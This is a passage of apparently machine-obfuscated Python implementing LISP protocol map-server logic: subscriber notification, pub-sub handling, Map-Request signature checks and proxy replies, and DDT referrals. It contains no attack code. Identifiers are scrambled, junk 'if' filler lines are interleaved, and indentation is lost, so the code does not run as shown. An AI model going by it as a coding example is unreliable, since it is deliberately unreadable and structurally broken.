if 98 - 98: o0oOOo0O0Ooo % I11i . Oo0Ooo * Oo0Ooo % iII111i
if 37 - 37: OoO0O00 / I1Ii111 . I1Ii111 * i1IIi
packet = i111ii1II11ii + OOO0O0O + OooooO0o0 + packet
return ( packet )
if 22 - 22: I1ii11iIi11i . II111iiii + iIii1I11I1II1 / OoooooooOO . ooOoO0o
if 13 - 13: II111iiii
if 36 - 36: iII111i - oO0o / Oo0Ooo / O0 . OoO0O00 . i1IIi
if 19 - 19: O0 . OoooooooOO % iIii1I11I1II1 - Ii1I . Ii1I + I1IiiI
if 98 - 98: oO0o . Oo0Ooo
if 9 - 9: I1Ii111 % IiII - i11iIiiIii - OOooOOo % iII111i % OoooooooOO
if 6 - 6: i1IIi - II111iiii * OoOoOO00 + oO0o
if 6 - 6: I1IiiI - ooOoO0o + I1IiiI + OoO0O00 - i11iIiiIii % ooOoO0o
def lisp_notify_subscribers ( lisp_sockets , eid_record , rloc_records ,
registered_eid , site ) :
if 64 - 64: OoooooooOO + OOooOOo
for IIi1II1I in lisp_pubsub_cache :
for iIiI1IIi1Ii1i in list ( lisp_pubsub_cache [ IIi1II1I ] . values ( ) ) :
I1i = iIiI1IIi1Ii1i . eid_prefix
if ( I1i . is_more_specific ( registered_eid ) == False ) : continue
if 57 - 57: I1Ii111 / OoO0O00 . OoOoOO00 % I1IiiI - OoO0O00 % o0oOOo0O0Ooo
I1IoOO0oOOOOO0 = iIiI1IIi1Ii1i . itr
O00oo0o0o0oo = iIiI1IIi1Ii1i . port
I1iii1iIiI111 = red ( I1IoOO0oOOOOO0 . print_address_no_iid ( ) , False )
Oo0Oo0o = bold ( "subscriber" , False )
oOOoO = "0x" + lisp_hex_string ( iIiI1IIi1Ii1i . xtr_id )
OOO0O0O = "0x" + lisp_hex_string ( iIiI1IIi1Ii1i . nonce )
if 64 - 64: OoO0O00 * Oo0Ooo . II111iiii * Oo0Ooo % ooOoO0o - IiII
lprint ( " Notify {} {}:{} xtr-id {} for {}, nonce {}" . format ( Oo0Oo0o , I1iii1iIiI111 , O00oo0o0o0oo , oOOoO , green ( IIi1II1I , False ) , OOO0O0O ) )
if 40 - 40: Ii1I - OOooOOo % I1Ii111 * oO0o
if 17 - 17: ooOoO0o - Ii1I * Ii1I % I1Ii111 - o0oOOo0O0Ooo + OoO0O00
if 71 - 71: OOooOOo . IiII / ooOoO0o
if 23 - 23: o0oOOo0O0Ooo * iIii1I11I1II1 - OoooooooOO - OoOoOO00
if 59 - 59: Ii1I - ooOoO0o / Ii1I - oO0o - iII111i
if 10 - 10: I1Ii111 . Oo0Ooo . Ii1I . i11iIiiIii / OoooooooOO
o0o0 = copy . deepcopy ( eid_record )
o0o0 . eid . copy_address ( I1i )
o0o0 = o0o0 . encode ( ) + rloc_records
lisp_build_map_notify ( lisp_sockets , o0o0 , [ IIi1II1I ] , 1 , I1IoOO0oOOOOO0 ,
O00oo0o0o0oo , iIiI1IIi1Ii1i . nonce , 0 , 0 , 0 , site , False )
if 64 - 64: II111iiii % I1ii11iIi11i . OoOoOO00 . iIii1I11I1II1 / I1ii11iIi11i
iIiI1IIi1Ii1i . map_notify_count += 1
if 43 - 43: OoooooooOO * I1IiiI
if 2 - 2: OOooOOo / oO0o + I1ii11iIi11i + i11iIiiIii % iIii1I11I1II1 . I1ii11iIi11i
return
if 100 - 100: Oo0Ooo * ooOoO0o + Ii1I / iII111i * o0oOOo0O0Ooo
if 26 - 26: I1Ii111 * OoOoOO00
if 38 - 38: II111iiii
if 50 - 50: OoOoOO00 . IiII - OOooOOo
if 46 - 46: iIii1I11I1II1
if 97 - 97: O0 * OOooOOo - o0oOOo0O0Ooo % o0oOOo0O0Ooo * II111iiii % I11i
if 65 - 65: iIii1I11I1II1 / OOooOOo
def lisp_process_pubsub ( lisp_sockets , packet , reply_eid , itr_rloc , port , nonce ,
ttl , xtr_id ) :
if 2 - 2: I11i - OOooOOo / o0oOOo0O0Ooo
if 14 - 14: I11i + Oo0Ooo + i11iIiiIii - i1IIi . O0
if 47 - 47: o0oOOo0O0Ooo / i1IIi * IiII
if 50 - 50: I11i
iIiI1IIi1Ii1i = lisp_store_pubsub_state ( reply_eid , itr_rloc , port , nonce , ttl ,
xtr_id )
if 9 - 9: iII111i . OoOoOO00 * iII111i
I11I = green ( reply_eid . print_prefix ( ) , False )
I1IoOO0oOOOOO0 = red ( itr_rloc . print_address_no_iid ( ) , False )
OoooO00OoooOo = bold ( "Map-Notify" , False )
xtr_id = "0x" + lisp_hex_string ( xtr_id )
lprint ( "{} pubsub request for {} to ack ITR {} xtr-id: {}" . format ( OoooO00OoooOo ,
I11I , I1IoOO0oOOOOO0 , xtr_id ) )
if 49 - 49: i1IIi * II111iiii * Oo0Ooo % oO0o / II111iiii
if 8 - 8: I1IiiI . o0oOOo0O0Ooo / OoooooooOO - II111iiii
if 93 - 93: OoOoOO00 / OoOoOO00 / OoOoOO00
if 74 - 74: ooOoO0o % Oo0Ooo - iII111i - I1IiiI
packet = lisp_convert_reply_to_notify ( packet )
lisp_send_map_notify ( lisp_sockets , packet , itr_rloc , port )
iIiI1IIi1Ii1i . map_notify_count += 1
return
if 51 - 51: i11iIiiIii % OoOoOO00
if 17 - 17: ooOoO0o - i1IIi
if 73 - 73: iIii1I11I1II1 - I1Ii111 % Oo0Ooo . O0
if 16 - 16: OoO0O00 / Oo0Ooo / IiII . Oo0Ooo - OoooooooOO
if 5 - 5: OoOoOO00 . I11i
if 28 - 28: I11i % OOooOOo + Oo0Ooo / OoO0O00 % o0oOOo0O0Ooo + OoO0O00
if 20 - 20: ooOoO0o . iII111i % OOooOOo + i11iIiiIii
if 64 - 64: i1IIi . o0oOOo0O0Ooo * I1Ii111 - O0
def lisp_ms_process_map_request ( lisp_sockets , packet , map_request , mr_source ,
mr_sport , ecm_source ) :
if 76 - 76: I1IiiI % Ii1I + OoO0O00 + I1ii11iIi11i * II111iiii + Oo0Ooo
if 3 - 3: Ii1I - I1IiiI + O0
if 90 - 90: Ii1I + OoooooooOO . i11iIiiIii / Oo0Ooo % OoOoOO00 / IiII
if 45 - 45: OoooooooOO / oO0o . I1ii11iIi11i + OOooOOo
if 54 - 54: Ii1I - o0oOOo0O0Ooo + OoOoOO00 / OoooooooOO
if 61 - 61: I11i / IiII % OoooooooOO - i11iIiiIii * i1IIi % o0oOOo0O0Ooo
I11I = map_request . target_eid
o0o0o = map_request . target_group
iIiI1I1ii1I1 = lisp_print_eid_tuple ( I11I , o0o0o )
o0OO = map_request . itr_rlocs [ 0 ]
oOOoO = map_request . xtr_id
OOO0O0O = map_request . nonce
oOoO0OooO0O = LISP_NO_ACTION
iIiI1IIi1Ii1i = map_request . subscribe_bit
if 67 - 67: o0oOOo0O0Ooo - Ii1I
if 29 - 29: OoOoOO00 . I1ii11iIi11i
if 24 - 24: OOooOOo + i1IIi . I11i . OoOoOO00 + OoooooooOO
if 98 - 98: ooOoO0o + i1IIi / I1IiiI
if 1 - 1: IiII . OoooooooOO + II111iiii
iiIi11i1ii1I = True
iiiI1i = ( lisp_get_eid_hash ( I11I ) != None )
if ( iiiI1i ) :
oo0 = map_request . map_request_signature
if ( oo0 == None ) :
iiIi11i1ii1I = False
lprint ( ( "EID-crypto-hash signature verification {}, " + "no signature found" ) . format ( bold ( "failed" , False ) ) )
if 91 - 91: II111iiii / iIii1I11I1II1 / OoOoOO00 . II111iiii
else :
Ii1IiI = map_request . signature_eid
oOo0oO0o , ooOoI1IiiI , iiIi11i1ii1I = lisp_lookup_public_key ( Ii1IiI )
if ( iiIi11i1ii1I ) :
iiIi11i1ii1I = map_request . verify_map_request_sig ( ooOoI1IiiI )
else :
lprint ( "Public-key lookup failed for sig-eid {}, hash-eid {}" . format ( Ii1IiI . print_address ( ) , oOo0oO0o . print_address ( ) ) )
if 18 - 18: OoO0O00 - I11i / OOooOOo / oO0o
if 53 - 53: I1ii11iIi11i % i1IIi . i11iIiiIii
I1I1i = bold ( "passed" , False ) if iiIi11i1ii1I else bold ( "failed" , False )
lprint ( "EID-crypto-hash signature verification {}" . format ( I1I1i ) )
if 28 - 28: OOooOOo / I1IiiI / IiII + I1IiiI / O0 / I11i
if 10 - 10: I1Ii111 * i1IIi
if 48 - 48: Oo0Ooo % i1IIi / iII111i . O0
if ( iIiI1IIi1Ii1i and iiIi11i1ii1I == False ) :
iIiI1IIi1Ii1i = False
lprint ( "Suppress creating pubsub state due to signature failure" )
if 27 - 27: I11i + iIii1I11I1II1 - i11iIiiIii
if 81 - 81: I11i + oO0o * iIii1I11I1II1 * IiII
if 7 - 7: I11i - I1IiiI . iII111i + O0 / iIii1I11I1II1 - I1Ii111
if 32 - 32: ooOoO0o
if 9 - 9: I1Ii111
if 77 - 77: OoooooooOO * I1Ii111
if 63 - 63: IiII * oO0o * iIii1I11I1II1
if 18 - 18: II111iiii * o0oOOo0O0Ooo % i11iIiiIii . OoOoOO00
if 40 - 40: oO0o - o0oOOo0O0Ooo * II111iiii
if 4 - 4: O0
if 9 - 9: Oo0Ooo . i1IIi - i1IIi + I1Ii111 * ooOoO0o . I1ii11iIi11i
if 17 - 17: I11i * I1ii11iIi11i % I1IiiI + OoO0O00 + IiII
if 90 - 90: OoooooooOO - I1IiiI / I1ii11iIi11i + oO0o - o0oOOo0O0Ooo
if 84 - 84: OoOoOO00 + O0 % Oo0Ooo
iiii1I1I11 = o0OO if ( o0OO . afi == ecm_source . afi ) else ecm_source
if 88 - 88: oO0o % ooOoO0o - i11iIiiIii + oO0o
i1iI11i = lisp_site_eid_lookup ( I11I , o0o0o , False )
if 9 - 9: OOooOOo + Oo0Ooo
if ( i1iI11i == None or i1iI11i . is_star_g ( ) ) :
oo0oO0Oo = bold ( "Site not found" , False )
lprint ( "{} for requested EID {}" . format ( oo0oO0Oo ,
green ( iIiI1I1ii1I1 , False ) ) )
if 41 - 41: II111iiii . i1IIi
if 78 - 78: I1IiiI * I11i % OOooOOo + Ii1I + OoOoOO00
if 23 - 23: iII111i / Oo0Ooo % OoooooooOO * OoooooooOO . iII111i / I1ii11iIi11i
if 30 - 30: oO0o - OoOoOO00 . I1IiiI
lisp_send_negative_map_reply ( lisp_sockets , I11I , o0o0o , OOO0O0O , o0OO ,
mr_sport , 15 , oOOoO , iIiI1IIi1Ii1i )
if 17 - 17: OoOoOO00
return ( [ I11I , o0o0o , LISP_DDT_ACTION_SITE_NOT_FOUND ] )
if 76 - 76: I1ii11iIi11i - ooOoO0o % OoooooooOO / Oo0Ooo % IiII / ooOoO0o
if 57 - 57: O0
OoO0oO = i1iI11i . print_eid_tuple ( )
IIiii = i1iI11i . site . site_name
if 58 - 58: iIii1I11I1II1
if 15 - 15: IiII / OOooOOo / I11i + i1IIi
if 95 - 95: i1IIi + II111iiii . iIii1I11I1II1 . OoooooooOO + o0oOOo0O0Ooo / iIii1I11I1II1
if 40 - 40: OoO0O00 / O0
if 60 - 60: iIii1I11I1II1 / Oo0Ooo / oO0o + iII111i
if ( iiiI1i == False and i1iI11i . require_signature ) :
oo0 = map_request . map_request_signature
Ii1IiI = map_request . signature_eid
if ( oo0 == None or Ii1IiI . is_null ( ) ) :
lprint ( "Signature required for site {}" . format ( IIiii ) )
iiIi11i1ii1I = False
else :
Ii1IiI = map_request . signature_eid
oOo0oO0o , ooOoI1IiiI , iiIi11i1ii1I = lisp_lookup_public_key ( Ii1IiI )
if ( iiIi11i1ii1I ) :
iiIi11i1ii1I = map_request . verify_map_request_sig ( ooOoI1IiiI )
else :
lprint ( "Public-key lookup failed for sig-eid {}, hash-eid {}" . format ( Ii1IiI . print_address ( ) , oOo0oO0o . print_address ( ) ) )
if 66 - 66: iIii1I11I1II1 . O0 * IiII . ooOoO0o + i1IIi
if 83 - 83: o0oOOo0O0Ooo / II111iiii + I1IiiI - iII111i + OoO0O00
I1I1i = bold ( "passed" , False ) if iiIi11i1ii1I else bold ( "failed" , False )
lprint ( "Required signature verification {}" . format ( I1I1i ) )
if 67 - 67: I1Ii111 - OoOoOO00 . i11iIiiIii - I1Ii111 . i11iIiiIii
if 25 - 25: I11i % I1Ii111 + Ii1I
if 46 - 46: ooOoO0o + Oo0Ooo + oO0o / II111iiii . iIii1I11I1II1 * I1IiiI
if 87 - 87: I11i + iIii1I11I1II1
if 91 - 91: oO0o
if 58 - 58: i11iIiiIii / Ii1I - OoooooooOO
if ( iiIi11i1ii1I and i1iI11i . registered == False ) :
lprint ( "Site '{}' with EID-prefix {} is not registered for EID {}" . format ( IIiii , green ( OoO0oO , False ) , green ( iIiI1I1ii1I1 , False ) ) )
if 25 - 25: i1IIi * ooOoO0o % OOooOOo / I1IiiI
if 75 - 75: i11iIiiIii
if 38 - 38: iIii1I11I1II1
if 80 - 80: OoO0O00
if 72 - 72: I11i * II111iiii
if 82 - 82: I1Ii111 . OoO0O00 * II111iiii
if ( i1iI11i . accept_more_specifics == False ) :
I11I = i1iI11i . eid
o0o0o = i1iI11i . group
if 99 - 99: iIii1I11I1II1 / iII111i % i1IIi - II111iiii / OoO0O00
if 33 - 33: OoooooooOO / i1IIi . Ii1I
if 96 - 96: OoOoOO00 / Oo0Ooo . II111iiii / ooOoO0o
if 56 - 56: IiII - ooOoO0o % oO0o / Oo0Ooo * oO0o % O0
if 71 - 71: iII111i / II111iiii - II111iiii / I1IiiI
O0O00O = 1
if ( i1iI11i . force_ttl != None ) :
O0O00O = i1iI11i . force_ttl | 0x80000000
if 24 - 24: O0 . I1IiiI + IiII . IiII
if 53 - 53: II111iiii + Ii1I * o0oOOo0O0Ooo
if 47 - 47: Ii1I % OOooOOo . Oo0Ooo
if 94 - 94: Ii1I - iIii1I11I1II1 + I1IiiI - iIii1I11I1II1 . o0oOOo0O0Ooo
if 3 - 3: O0 / I11i + OoOoOO00 % IiII / i11iIiiIii
lisp_send_negative_map_reply ( lisp_sockets , I11I , o0o0o , OOO0O0O , o0OO ,
mr_sport , O0O00O , oOOoO , iIiI1IIi1Ii1i )
if 25 - 25: II111iiii / I1ii11iIi11i % iIii1I11I1II1
return ( [ I11I , o0o0o , LISP_DDT_ACTION_MS_NOT_REG ] )
if 69 - 69: IiII
if 36 - 36: I1IiiI / oO0o
if 72 - 72: i1IIi - I1ii11iIi11i . OOooOOo + I1Ii111 - ooOoO0o
if 69 - 69: o0oOOo0O0Ooo * I1IiiI - I11i
if 11 - 11: OOooOOo * O0
Iiii1iiI = False
I1i1i = ""
oo00ooo0OOO00 = False
if ( i1iI11i . force_nat_proxy_reply ) :
I1i1i = ", nat-forced"
Iiii1iiI = True
oo00ooo0OOO00 = True
elif ( i1iI11i . force_proxy_reply ) :
I1i1i = ", forced"
oo00ooo0OOO00 = True
elif ( i1iI11i . proxy_reply_requested ) :
I1i1i = ", requested"
oo00ooo0OOO00 = True
elif ( map_request . pitr_bit and i1iI11i . pitr_proxy_reply_drop ) :
I1i1i = ", drop-to-pitr"
oOoO0OooO0O = LISP_DROP_ACTION
elif ( i1iI11i . proxy_reply_action != "" ) :
oOoO0OooO0O = i1iI11i . proxy_reply_action
I1i1i = ", forced, action {}" . format ( oOoO0OooO0O )
oOoO0OooO0O = LISP_DROP_ACTION if ( oOoO0OooO0O == "drop" ) else LISP_NATIVE_FORWARD_ACTION
if 56 - 56: I1ii11iIi11i * o0oOOo0O0Ooo - iII111i - ooOoO0o - I11i
if 9 - 9: I1IiiI / O0 + I11i
if 39 - 39: OoooooooOO * I1ii11iIi11i + II111iiii . I1Ii111 / II111iiii . I1ii11iIi11i
if 72 - 72: OoOoOO00
if 21 - 21: oO0o
if 58 - 58: OoOoOO00 + i11iIiiIii % OOooOOo - i1IIi
if 39 - 39: OoooooooOO . I1IiiI + OoOoOO00
oO0oOoo = False
O0o0Oo0oO0o0 = None
if ( oo00ooo0OOO00 and i1iI11i . policy in lisp_policies ) :
o00oo = lisp_policies [ i1iI11i . policy ]
if ( o00oo . match_policy_map_request ( map_request , mr_source ) ) : O0o0Oo0oO0o0 = o00oo
if 39 - 39: OOooOOo / I1IiiI / iIii1I11I1II1 + Ii1I - i11iIiiIii
if ( O0o0Oo0oO0o0 ) :
III1i1IIII1i = bold ( "matched" , False )
lprint ( "Map-Request {} policy '{}', set-action '{}'" . format ( III1i1IIII1i ,
o00oo . policy_name , o00oo . set_action ) )
else :
III1i1IIII1i = bold ( "no match" , False )
lprint ( "Map-Request {} for policy '{}', implied drop" . format ( III1i1IIII1i ,
o00oo . policy_name ) )
oO0oOoo = True
if 25 - 25: iII111i . OOooOOo * I1IiiI % OoO0O00 - O0 . I1IiiI
if 92 - 92: I11i * I1Ii111 . O0 - oO0o + i1IIi % Oo0Ooo
if 39 - 39: I1Ii111 - I1IiiI
if ( I1i1i != "" ) :
lprint ( "Proxy-replying for EID {}, found site '{}' EID-prefix {}{}" . format ( green ( iIiI1I1ii1I1 , False ) , IIiii , green ( OoO0oO , False ) ,
# i1IIi . OoO0O00
I1i1i ) )
if 85 - 85: i11iIiiIii / OOooOOo / I11i - OOooOOo
IiIiIiiII1I = i1iI11i . registered_rlocs
O0O00O = 1440
if ( Iiii1iiI ) :
if ( i1iI11i . site_id != 0 ) :
OoiIii11i11i = map_request . source_eid
IiIiIiiII1I = lisp_get_private_rloc_set ( i1iI11i , OoiIii11i11i , o0o0o )
if 46 - 46: oO0o
if ( IiIiIiiII1I == i1iI11i . registered_rlocs ) :
IiIIIIi11ii = ( i1iI11i . group . is_null ( ) == False )
ooO0Oo = lisp_get_partial_rloc_set ( IiIiIiiII1I , iiii1I1I11 , IiIIIIi11ii )
if ( ooO0Oo != IiIiIiiII1I ) :
O0O00O = 15
IiIiIiiII1I = ooO0Oo
if 86 - 86: O0 - Oo0Ooo
if 80 - 80: o0oOOo0O0Ooo - I1Ii111 * O0 * iIii1I11I1II1
if 59 - 59: I1ii11iIi11i + I11i / OoO0O00
if 36 - 36: o0oOOo0O0Ooo + ooOoO0o * I11i
if 81 - 81: OOooOOo * I11i - I1ii11iIi11i
if 82 - 82: I1ii11iIi11i * II111iiii - OoooooooOO % iII111i * I1IiiI % OoOoOO00
if 81 - 81: I11i + o0oOOo0O0Ooo / iII111i
if 35 - 35: ooOoO0o % I11i * I1ii11iIi11i
if ( i1iI11i . force_ttl != None ) :
O0O00O = i1iI11i . force_ttl | 0x80000000
if 10 - 10: OoO0O00 + OoooooooOO + I1Ii111
if 57 - 57: Ii1I % Ii1I * Oo0Ooo % i11iIiiIii
if 12 - 12: oO0o . Oo0Ooo . I1IiiI - i11iIiiIii / o0oOOo0O0Ooo
if 54 - 54: i11iIiiIii + I1Ii111 . I1Ii111 * I1ii11iIi11i % I1Ii111 - OoooooooOO
if 76 - 76: IiII + i1IIi + i11iIiiIii . oO0o
if 23 - 23: ooOoO0o - OoO0O00 + oO0o . OOooOOo - I1IiiI
if ( O0o0Oo0oO0o0 ) :
if ( O0o0Oo0oO0o0 . set_record_ttl ) :
O0O00O = O0o0Oo0oO0o0 . set_record_ttl
lprint ( "Policy set-record-ttl to {}" . format ( O0O00O ) )
if 66 - 66: iII111i % iII111i
if ( O0o0Oo0oO0o0 . set_action == "drop" ) :
lprint ( "Policy set-action drop, send negative Map-Reply" )
oOoO0OooO0O = LISP_POLICY_DENIED_ACTION
IiIiIiiII1I = [ ]
else :
OooOOoOO0OO = O0o0Oo0oO0o0 . set_policy_map_reply ( )
if ( OooOOoOO0OO ) : IiIiIiiII1I = [ OooOOoOO0OO ]
if 59 - 59: II111iiii . i1IIi % i1IIi
if 40 - 40: I1Ii111 . II111iiii * o0oOOo0O0Ooo + I11i - i1IIi
if 67 - 67: o0oOOo0O0Ooo - O0 - i1IIi . ooOoO0o . iII111i
if ( oO0oOoo ) :
lprint ( "Implied drop action, send negative Map-Reply" )
oOoO0OooO0O = LISP_POLICY_DENIED_ACTION
IiIiIiiII1I = [ ]
if 43 - 43: II111iiii . o0oOOo0O0Ooo + i11iIiiIii . O0 / O0 . II111iiii
if 13 - 13: Ii1I % i11iIiiIii
Oo0Oo00Ooo = i1iI11i . echo_nonce_capable
if 3 - 3: ooOoO0o % OoOoOO00 * I1Ii111 - OoO0O00 / i1IIi % I1IiiI
if 50 - 50: I1ii11iIi11i + iII111i
if 64 - 64: oO0o
if 11 - 11: o0oOOo0O0Ooo
if ( iiIi11i1ii1I ) :
ooIiIII1 = i1iI11i . eid
i1Ii1IiI = i1iI11i . group
else :
ooIiIII1 = I11I
i1Ii1IiI = o0o0o
oOoO0OooO0O = LISP_AUTH_FAILURE_ACTION
IiIiIiiII1I = [ ]
if 7 - 7: oO0o - I11i
if 59 - 59: Ii1I / o0oOOo0O0Ooo / OoO0O00 + IiII + i11iIiiIii
if 64 - 64: o0oOOo0O0Ooo * IiII * IiII * iII111i % i11iIiiIii
if 22 - 22: I1ii11iIi11i * II111iiii - OOooOOo % i11iIiiIii
if 10 - 10: OOooOOo / I1ii11iIi11i
if 21 - 21: OoO0O00 % Oo0Ooo . o0oOOo0O0Ooo + IiII
if ( iIiI1IIi1Ii1i ) :
ooIiIII1 = I11I
i1Ii1IiI = o0o0o
if 48 - 48: O0 / i1IIi / iII111i
if 11 - 11: O0 - OoO0O00 + OoOoOO00 * ooOoO0o - Ii1I
if 82 - 82: Ii1I - O0 * ooOoO0o . ooOoO0o
if 32 - 32: o0oOOo0O0Ooo . OoooooooOO % OOooOOo
if 2 - 2: OoOoOO00 + I1ii11iIi11i + oO0o
if 27 - 27: OoooooooOO - Ii1I / OoooooooOO + OoO0O00
packet = lisp_build_map_reply ( ooIiIII1 , i1Ii1IiI , IiIiIiiII1I ,
OOO0O0O , oOoO0OooO0O , O0O00O , map_request , None , Oo0Oo00Ooo , False )
if 58 - 58: OOooOOo * I11i . I1IiiI
if ( iIiI1IIi1Ii1i ) :
lisp_process_pubsub ( lisp_sockets , packet , ooIiIII1 , o0OO ,
mr_sport , OOO0O0O , O0O00O , oOOoO )
else :
lisp_send_map_reply ( lisp_sockets , packet , o0OO , mr_sport )
if 46 - 46: I11i + II111iiii * iII111i % ooOoO0o - I1IiiI
if 73 - 73: I1ii11iIi11i * iIii1I11I1II1 . I1Ii111 - Ii1I
return ( [ i1iI11i . eid , i1iI11i . group , LISP_DDT_ACTION_MS_ACK ] )
if 11 - 11: I11i
if 48 - 48: IiII / O0
if 46 - 46: ooOoO0o + oO0o
if 7 - 7: ooOoO0o * oO0o . i1IIi
if 74 - 74: i1IIi * I11i + OoOoOO00 / OoO0O00 - oO0o / I11i
O000O0 = len ( i1iI11i . registered_rlocs )
if ( O000O0 == 0 ) :
lprint ( ( "Requested EID {} found site '{}' with EID-prefix {} with " + "no registered RLOCs" ) . format ( green ( iIiI1I1ii1I1 , False ) , IIiii ,
# OOooOOo + Ii1I * i1IIi - IiII - Ii1I . OoOoOO00
green ( OoO0oO , False ) ) )
return ( [ i1iI11i . eid , i1iI11i . group , LISP_DDT_ACTION_MS_ACK ] )
if 34 - 34: I1IiiI * OoOoOO00
if 54 - 54: OoooooooOO . iII111i - OoooooooOO / OOooOOo / iIii1I11I1II1 * O0
if 12 - 12: Ii1I % OOooOOo % Oo0Ooo * I1Ii111
if 96 - 96: iII111i + ooOoO0o
if 100 - 100: OOooOOo . ooOoO0o + Ii1I + Ii1I
o0o = map_request . target_eid if map_request . source_eid . is_null ( ) else map_request . source_eid
if 13 - 13: I1ii11iIi11i / Ii1I / OoooooooOO % ooOoO0o
iiIIII11iIii = map_request . target_eid . hash_address ( o0o )
iiIIII11iIii %= O000O0
I111iiI1iI = i1iI11i . registered_rlocs [ iiIIII11iIii ]
if 28 - 28: o0oOOo0O0Ooo . o0oOOo0O0Ooo . o0oOOo0O0Ooo
if ( I111iiI1iI . rloc . is_null ( ) ) :
lprint ( ( "Suppress forwarding Map-Request for EID {} at site '{}' " + "EID-prefix {}, no RLOC address" ) . format ( green ( iIiI1I1ii1I1 , False ) ,
# II111iiii / IiII . i1IIi + I1Ii111 / OoO0O00 - OoooooooOO
IIiii , green ( OoO0oO , False ) ) )
else :
lprint ( ( "Forwarding Map-Request for EID {} to ETR {} at site '{}' " + "EID-prefix {}" ) . format ( green ( iIiI1I1ii1I1 , False ) ,
# i11iIiiIii * I1ii11iIi11i * ooOoO0o % iIii1I11I1II1 + iII111i
red ( I111iiI1iI . rloc . print_address ( ) , False ) , IIiii ,
green ( OoO0oO , False ) ) )
if 51 - 51: O0 - I11i . o0oOOo0O0Ooo + o0oOOo0O0Ooo / I1Ii111
if 32 - 32: II111iiii - Oo0Ooo
if 69 - 69: o0oOOo0O0Ooo * I1ii11iIi11i / o0oOOo0O0Ooo * OoooooooOO
if 60 - 60: OoOoOO00 / i1IIi * Oo0Ooo / i1IIi
lisp_send_ecm ( lisp_sockets , packet , map_request . source_eid , mr_sport ,
map_request . target_eid , I111iiI1iI . rloc , to_etr = True )
if 86 - 86: OoOoOO00 . I11i
return ( [ i1iI11i . eid , i1iI11i . group , LISP_DDT_ACTION_MS_ACK ] )
if 97 - 97: Ii1I
if 24 - 24: I1IiiI * i11iIiiIii
if 83 - 83: OoOoOO00 * I1ii11iIi11i
if 64 - 64: II111iiii * i1IIi - ooOoO0o
if 4 - 4: ooOoO0o . OoO0O00 . OoO0O00 % ooOoO0o * Oo0Ooo - I1IiiI
if 8 - 8: I1IiiI - I1Ii111 - OoooooooOO * Oo0Ooo * Ii1I
if 11 - 11: I1IiiI
def lisp_ddt_process_map_request ( lisp_sockets , map_request , ecm_source , port ) :
if 43 - 43: I11i
if 78 - 78: Ii1I % Oo0Ooo / OoO0O00 . iIii1I11I1II1 . II111iiii
if 67 - 67: oO0o % I1Ii111
if 72 - 72: I1IiiI . i11iIiiIii . OoOoOO00 + I1IiiI - I1Ii111 + iII111i
I11I = map_request . target_eid
o0o0o = map_request . target_group
iIiI1I1ii1I1 = lisp_print_eid_tuple ( I11I , o0o0o )
OOO0O0O = map_request . nonce
oOoO0OooO0O = LISP_DDT_ACTION_NULL
if 15 - 15: I1IiiI
if 88 - 88: IiII / I1ii11iIi11i % I11i + i11iIiiIii * O0 . I1Ii111
if 69 - 69: Oo0Ooo - OOooOOo / I1IiiI . i11iIiiIii * OoO0O00
if 45 - 45: I1Ii111 + OOooOOo
if 78 - 78: OoOoOO00 . Oo0Ooo % I11i
IIi1Ii1i11i = None
if ( lisp_i_am_ms ) :
i1iI11i = lisp_site_eid_lookup ( I11I , o0o0o , False )
if ( i1iI11i == None ) : return
if 79 - 79: IiII - OOooOOo
if ( i1iI11i . registered ) :
oOoO0OooO0O = LISP_DDT_ACTION_MS_ACK
O0O00O = 1440
else :
I11I , o0o0o , oOoO0OooO0O = lisp_ms_compute_neg_prefix ( I11I , o0o0o )
oOoO0OooO0O = LISP_DDT_ACTION_MS_NOT_REG
O0O00O = 1
if 14 - 14: o0oOOo0O0Ooo * iII111i . OoO0O00 + i11iIiiIii + O0 / I11i
else :
IIi1Ii1i11i = lisp_ddt_cache_lookup ( I11I , o0o0o , False )
if ( IIi1Ii1i11i == None ) :
oOoO0OooO0O = LISP_DDT_ACTION_NOT_AUTH
O0O00O = 0
lprint ( "DDT delegation entry not found for EID {}" . format ( green ( iIiI1I1ii1I1 , False ) ) )
if 99 - 99: I11i
elif ( IIi1Ii1i11i . is_auth_prefix ( ) ) :
if 61 - 61: i1IIi - i1IIi
if 97 - 97: I11i + II111iiii / OoooooooOO + I1ii11iIi11i * o0oOOo0O0Ooo
if 29 - 29: I1Ii111
if 95 - 95: OoOoOO00 * II111iiii + I1ii11iIi11i - I11i . I11i % i11iIiiIii
oOoO0OooO0O = LISP_DDT_ACTION_DELEGATION_HOLE
O0O00O = 15
iiiII1 = IIi1Ii1i11i . print_eid_tuple ( )
lprint ( ( "DDT delegation entry not found but auth-prefix {} " + "found for EID {}" ) . format ( iiiII1 ,
# I1IiiI . ooOoO0o . II111iiii % OOooOOo
green ( iIiI1I1ii1I1 , False ) ) )
if 86 - 86: i11iIiiIii + I1ii11iIi11i / OoOoOO00 * OoooooooOO
if ( o0o0o . is_null ( ) ) :
I11I = lisp_ddt_compute_neg_prefix ( I11I , IIi1Ii1i11i ,
lisp_ddt_cache )
else :
o0o0o = lisp_ddt_compute_neg_prefix ( o0o0o , IIi1Ii1i11i ,
lisp_ddt_cache )
I11I = lisp_ddt_compute_neg_prefix ( I11I , IIi1Ii1i11i ,
IIi1Ii1i11i . source_cache )
if 6 - 6: II111iiii
IIi1Ii1i11i = None
else :
iiiII1 = IIi1Ii1i11i . print_eid_tuple ( )
lprint ( "DDT delegation entry {} found for EID {}" . format ( iiiII1 , green ( iIiI1I1ii1I1 , False ) ) )
if 26 - 26: iIii1I11I1II1 / iIii1I11I1II1 . IiII * i11iIiiIii
O0O00O = 1440
if 21 - 21: OOooOOo + o0oOOo0O0Ooo
if 28 - 28: OOooOOo + i1IIi + II111iiii / Oo0Ooo + iIii1I11I1II1 . Oo0Ooo
if 73 - 73: Ii1I * iIii1I11I1II1 / o0oOOo0O0Ooo - o0oOOo0O0Ooo / i1IIi
if 64 - 64: Ii1I * I1ii11iIi11i % II111iiii
if 31 - 31: iIii1I11I1II1 % Oo0Ooo . I1IiiI % ooOoO0o
if 38 - 38: I1ii11iIi11i + I1Ii111 * I11i / OoO0O00 + o0oOOo0O0Ooo
OO0Oo00OO0oo = lisp_build_map_referral ( I11I , o0o0o , IIi1Ii1i11i , oOoO0OooO0O , O0O00O , OOO0O0O )
OOO0O0O = map_request . nonce >> 32
if ( map_request . nonce != 0 and OOO0O0O != 0xdfdf0e1d ) : port = LISP_CTRL_PORT
lisp_send_map_referral ( lisp_sockets , OO0Oo00OO0oo , ecm_source , port )
return
if 46 - 46: iII111i
if 56 - 56: Oo0Ooo / II111iiii
